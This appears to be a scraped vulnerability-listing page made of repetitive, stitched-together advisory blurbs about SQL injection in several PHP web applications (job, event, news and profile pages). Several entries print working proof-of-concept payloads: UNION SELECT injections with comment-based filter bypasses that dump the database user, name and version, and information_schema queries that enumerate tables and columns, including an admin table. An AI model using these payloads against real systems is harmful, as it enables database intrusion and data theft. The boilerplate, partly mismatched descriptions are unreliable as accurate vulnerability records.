The vulnerability allows an attacker to inject sql commands into the 'pr_id' parameter of the 'jobdetails.php' script. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter.
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/list?city=[SQL]&main_search= -'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
The vulnerability allows an attacker to inject sql commands by sending a maliciously crafted HTTP request to the vulnerable application. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The proof of concept involves sending a maliciously crafted HTTP request to the vulnerable application.
The vulnerability allows an users to inject sql commands into the vulnerable parameter of the application.
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/event-list?city=[SQL]&main_search=-176'+UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+-
The vulnerability allows an attacker to inject sql commands by manipulating the 'marital' and 'gender' parameters in the 'search_result.php' script.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/service_detail.php?pid=[SQL] -6'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--+- 2) http://localhost/[PATH]/event_detail.php?eventid=[SQL] -18'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7--+- 3) http://localhost/[PATH]/news_detail.php?newid=[SQL] -27'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),3,4,5,6--+-
The vulnerability allows an attacker to inject sql commands into the 'city' parameter of the 'list' page, which can be used to extract information from the database.
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'rid1' of the jobsearch_all.php file.
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'id' of the 'other-user-profile.php' page.
Services By CQR